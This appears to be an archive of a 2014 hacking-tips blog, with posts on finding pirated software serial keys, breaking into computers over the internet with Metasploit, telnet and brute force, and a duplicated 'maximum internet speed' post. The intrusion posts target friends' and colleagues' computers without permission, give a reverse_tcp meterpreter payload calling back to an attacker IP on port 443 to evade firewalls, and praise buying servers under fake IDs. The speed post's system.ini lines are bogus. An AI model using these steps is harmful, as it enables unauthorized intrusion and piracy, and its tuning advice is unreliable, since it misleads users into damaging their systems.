Tuesday, 11 November 2014

How To Find Serial Key Of Any Software ?


How To Find Serial Key Of Any Software ? 


The key 94FBR is a part of Office 2000 Pro CD activation key that is widely distributed as it bypasses the activation requirements of Office 2000 Pro. By searching for 94fbr and the product name, you are guarantee that the pages that are returned are pages dealing specifically with the product you're wanting a serial for. Follow simple steps given below to learn this trick 

Step:1. Go to Google.Com

Step:2. Then type Software Name 94FBR  

  • Replace Software Name with the name of software whose serial key you want to find 
  • Eg: To find serial key of Nero i will type Photoshop 7 94fbr 
Step:3. Now press Enter and you will find serial key of software you are looking for as shown below.



Tuesday, 4 November 2014

How to do Hacking the Internet(WAN) Not LAN Using Metasploit – The Logic

How to do Hacking the Internet(WAN) Not LAN Using Metasploit – The Logic

A few days ago there's someone put a message on my contact in this website, he asking about "is it possible to do hacking outside LAN(Local Area Network)?". When you see all of my articles, 80% of all hacking articles were written for Local Area Network, because I'm doing in my own lab, "so how about hacking outside Local Area Network?". Of course it has the same logic like when you attacking from Local Area Network :-) .

Requirement :

1. Virtual Private Server. For Backtrack 5 already installed VPSyou can view here (but you also can install yourself)
3. Cloud Server(I haven't try this :-) ) e.g : Amazon
4. Internet With Public IP
5. You can control router by yourself

Step-By-Step How to do Hacking the Internet(WAN) Not LAN Using Metasploit – The Logic:

1. Okay let's start from Virtual Private Server(VPS). This server can give you freedom to install any software you want on virtualization, because this hosting type give you flexibility to manage your server yourself (DIY) :-)
2. Dedicated Server almost doing the same like VPS(Virtual Private Server), but usually you have your own machine and then you put your machine on data center(or the service provider rent you their machine). This hosting type also allow you as user to manage your system yourself. You can do anything to your server and install anything you want to your server.
3. Cloud server –> I haven't trying this…maybe someone can share :-)
4. You have internet with public IP address… usually when you subscribe 1:1 internet bandwidth, they also give you 1 public IP.
5. Control router by ourselves to redirect incoming connection or outgoing connection.
Before we continue to next step, let's see the figure below(I will try to figure it out in simple way) :

Information(Attacker) :
– Attacker1 use local IP address –> 192.168.8.8
– Attacker1 have public IP address –> 73.67.123.85
– Attacker1 can control his router to redirect any incoming/outgoing traffic.
– Attacker2 use VPS/Dedicated/Cloud server to do an attack that connected directly to internet.
Information(Victim) :
– Victim1 have local IP address –> 192.168.1.2
– Victim2 connected to internet via router+firewall, this firewall only allowing port 80 and 443 for outgoing connection
– Victim2 connected directly to internet with IP address –> 98.87.112.89

How to Attack? :

Actually the network topology I draw above it's almost the same method to attack, you should know what is typical rules when administrator setting up a firewall(in this case is the network administrator who administer router for victim1). AFAIK they usually open specific port like :
TCP 80(Hyper Text Transfer Protocol – HTTP) –> For browsing and surfing the website
TCP 443(Secure Socket Layer – SSL) –> Secure HTTP connection or usually called HTTPS
etc(you can scan it first but be careful).
From the information above, usually attacker can create some payload and options like this :
set payload windows/meterpreter/reverse_tcp

set lhost 73.67.123.85

set lport 443
When the attack successfully launch, the payload will try to connect to IP address 73.67.123.85 with port 443. Attacker use port 443 because he know that victim1 firewall only allow port 80 and 443 for outgoing connection. If you configure the payload by using another port, the victim1 firewall will drop all unintended packet who will go through another port except 80 and 443. For the next step, attacker should configure his router to redirect all incoming traffic to port 443 to his local IP address 192.168.8.8.
You can see the tutorial about example port forwarding WRT54G router here. Actually all router will have the same option for port forwarding :-)

Update :

If you use Windows machine as a router, you can read about port forwarding tutorial here
Oops…I almost forget to explain how to do that from VPS/Dedicated/Cloud….
Actually from VPS/Dedicated/Cloud it will be more easier and also safer(maybe..LoL), because there's a lot of hacker use this service…they buy using fake ID(hit and run) and then perform an attack from its server. The logic is almost the same with I've already explained above.
You should remember that every action triggering some consequences even it's good or bad. When you doing something you should know every consequences you will get later when doing the action. Be wise :-)
Hope you found it useful.
If information I wrote here was wrong, let me know I'll correct it :-)

How to Hacking WAN Internet by Using Public Dynamic IP Address

How to Hacking WAN Internet by Using Public Dynamic IP Address

I have another request tutorial about how to set up an attack via WAN / Internet. This guy asking how to set up an attack when he only have a 3G internet modem, as you know that maybe some 3G internet modem will use a public dynamic IP address(the ip address will change dynamically).
Actually I can't write the tutorial very detailed(with screenshot) because now I didn't use the 3G modem but I already try it when I was in Indonesia, but I will try harder to make you can understand what i want to convey in this article. :-)

Requirements :

1. DynDNS account (click here to register)
2. Internet Modem with public dynamic IP address.

Step by Step :

1. Log in to your DynDNS account, then click on "Add Zone/Domain Services" (click here).
How to Hacking WAN Internet by Using Public Dynamic IP Address
2. Then the next step you need to choose the sub domain name from dyndns(because we use the free one) and then fill the rest of that form(click here)
How to Hacking WAN Internet by Using Public Dynamic IP Address


Information :
Hostname --> just fill the name you want to use.

Service type --> choose host with IP address(because you use dynamic IP).

IP Address --> In example above I'm using IP address of google.com(74.125.71.105),
but you can fill it with your own ip(see the red box) that already detected by
the system. If you still unsure about your IP, you can view how to check my public IP address.

How to hack remote computer using IP Address

How to hack remote computer using IP Address

Literally, hacking is accessing something or somebody in internet without their permission or interest. While, speaking in summary, hacking is very easy job, it is like instead of using front door, finding the hidden door of a house and hijacking the precious things. Among all the hacking, hacking via IP address is one of the most common yet powerful beginning.
You may want to hack the website and put your advertisement there or grab some database information In this type of hacking, you are playing with the web server’s computer instead of the administrator’s computer. Because, www.website.com is hosted in separate web server rather than personal computer.
Another can be accessing your friend’s computer from your home. Again this is IP based and this is possible only when your friend’s computer is online. If it is off or not connected to internet then remote IP hacking is totally impossible.
Well, both of the hacking has the same process. Let’s summarize what we must do.
  1. Confirm the website or a computer you want to hack.
  2. Find or trace their IP address.
  3. Make sure that IP address is online
  4. Scan for open ports
  5. Check for venerable ports
  6. access through the port
  7. Brute-force username and password
Now let me describe in brief in merely basic steps that a child can understand it.
First, getting the IP address of victim.
To get the IP address of the victim website, ping for it in command prompt.
For example,
ping www.google.com
will fetch the IP address of Google.com
a How to hack remote computer using IP Address
This is how we can get the IP address of the victims website.
How about your friend’s PC? You can’t do www.yourfirend’sname.com, can you? Finding your friend’s IP address is little tough job, and tougher it is if he has dynamic IP address that keeps changing.
One of the widely used method to detect IP address of your friend is by chatting with him.
You might find this article helpful
Now you got the IP address right? Is it online?
To know the online status just ping the IP address, if it is online it will reply.
If the IP address is online, scan for the open ports. Open ports are like closed door without locks, you can go inside and outside easily.
Use Advanced Port Scanner to scan all open and venerable ports.
b How to hack remote computer using IP Address
Now you’ve IP address and open port address of the victim, you can now use telnet to try to access them. Make sure that you’ve telnet enabled in your computer or install it from Control panel > Add remove programs > add windows components.
Now open command prompt and use telnet command to access to the IP address. Use following syntax for connection.
telnet [IP address] [Port]
c How to hack remote computer using IP Address
You’ll be asked to input login information.
d How to hack remote computer using IP Address
If you can guess the informations easily then it’s OK. Or you can use some brute-forcing tools like this one.
In this way you’ll able to hack remove computer using only IP address

Hack Any PC Using IP Via Metasploit

Hack Any PC Using IP Via Metasploit 


Usually whenever you are thinking to do some stuff with your friend's computer or maybe your colleague’s laptop without a physical contact with his/her things that may seem a little bit impossible.
But with the help of the Metasploit feature you can even fully control his entire network or computer by just having his/her computer’s IP address and a few steps which I will shortly guide you through.

It's really important and highly recommended to have a basic knowledge about coding specially on CMD and Linux environments like Red Hat Linux or the other available distros. Well for this moment I will consider that you have the recommended skills to do the real hacking, just follow  me up.

1    1.)    First you need to download Metasploit. The most up-to-date version is FREE at metasploit.com.

2.) You need PostgrSQL for your database.
Download here:http://www.postgresql.org/
Make sure you use all the defaults or Metasploit won't work!

3.) Now lets get down to buisness... After installing both tools, open up the PostgrSQL admin gui (start -> all programs -> PostgreSQL 9.0 -> pgAdmin III).
Then right-click on your server (in the left hand box) and click connect. Remember to keep this window open the whole time. You will also need the pass you chose to use in step 5...

4.) Time for some hacking! Go to start -> all programs -> Metasploit Framework, and then open the Metasploit GUI.

5.)Now, in the window type:

db_connect postgres:ThePassYouChose@localhost:5432

The first time you do this you will see lots of text flash buy. Don't worry, this is normal.

6.) Type db_host to make sure you are connected correctly.

7.)Now type this:

db_nmap 000.000.000.000

Make sure you put the ip of the computer you are trying to hack in the place of 000.000.000.000...

8.) Now we get to the fun part; the automatic exploitation.
Just type db_autopwn -t -p -e -s -b ,
Watch the auto-exploitation start, go play Halo for a while, and then come back...

9.) After the exploitation is done, type sessions -l to see what the scanner found. If all went well, you should see a list of exploits.

10.) Now we get to use the exploits to hack the computer! If you will notice, all of the exploits are numbered, and they all have obvious names (i. e., reverseScreen_tcp). In order to use an exploit, type this:

Sessions -i ExploitNumber

The features of Metasploit are much like a rat. Once you get into someone's computer, you can see their screen, control their mouse, see what they type, see them, etc.

Hack a Computer Only with just a IP Address in Easy steps

Hack a Computer Only with just a IP Address in Easy steps:


Steps to Hack IP Address:


1) Prepare the IP address of the Victim. (e.g : 101.23.53.70 ) 


2) Download and Install Advanced Port Scanner.


3) Open Advanced Port Scanner and Type the IP Address in the right column and Click Scan.
4) It will lists you all Opened Ports of the Victim’s PC or Router. (e.g : Port 91 )
 
5) After retrieving the IP address and the Opened Ports of the Victim, Open Command Prompt (CMD)
 
and Type: telnet [IP ADDRESS] [PORT]
 
e.g : telnet 101.23.53.70  91
 
6) Now you’ll be asked to Enter Login Information, Just type Username and Password and hit Enter.
If no password is used just type the Username.

Done! Now you’ll get access to all Victim’s Files and Documents by browsing with CMD (use cd, copy, delete, mv… to do all tricks.)


Enjoy :)

Tuesday, 28 October 2014

How To Get Maximum Internet Speed

How To Get Maximum Internet Speed:- 






 In the previous article, which you can see here, we learned about how to speed up the internet connection using Google public DNS. In this article we will discover how to speed up the internet connection even more with several methods.
Method 1: system.ini document
Here we will use the system.ini document to speed up our connection, simply
follow these steps:
1) Go to run and type system.ini. Something like this should show:

You should know that it will probably look different on your computer,what’s important when you opened the file is that you follow the next step
2) Delete everything from the system.ini and paste the following:
page buffer=100000kbps load=100000kbps
Download=100000kbps save=100000kbps
back=100000kb

Method 2: TCP OPTIMIZER
If you are using Wi-Fi then TCP optimizer will help you out and you can download it from this link. Once you have downloaded the software you will have a window like this one:

From here on you can play with the settings to speed up your connection.
Method 3: Autobahn Accelerator
This is another program that will help improve your internet connection, it’s a small program that runs in the background and it doesn’t only help for you internet connection, it also reduces time to buffer a video. You can download it from here. After you install it, it should be already running.
Method 4: RAMRush
This is a pretty nice software which will optimize your RAM and again, improve your internet connection. You can download it from here. Once you have installed it it should look something like this:

That’s it! Using all of these will give you maximum internet speed

How To Get Maximum Internet Speed

How To Get Maximum Internet Speed:- 






 In the previous article, which you can see here, we learned about how to speed up the internet connection using Google public DNS. In this article we will discover how to speed up the internet connection even more with several methods.
Method 1: system.ini document
Here we will use the system.ini document to speed up our connection, simply
follow these steps:
1) Go to run and type system.ini. Something like this should show:



You should know that it will probably look different on your computer,what’s important when you opened the file is that you follow the next step
2) Delete everything from the system.ini and paste the following:
page buffer=100000kbps load=100000kbps
Download=100000kbps save=100000kbps
back=100000kb

Method 2: TCP OPTIMIZER
If you are using Wi-Fi then TCP optimizer will help you out and you can download it from this link. Once you have downloaded the software you will have a window like this one:

From here on you can play with the settings to speed up your connection.
Method 3: Autobahn Accelerator
This is another program that will help improve your internet connection, it’s a small program that runs in the background and it doesn’t only help for you internet connection, it also reduces time to buffer a video. You can download it from here. After you install it, it should be already running.

Method 4: RAMRush
This is a pretty nice software which will optimize your RAM and again, improve your internet connection. You can download it from here. Once you have installed it it should look something like this:

That’s it! Using all of these will give you maximum internet speed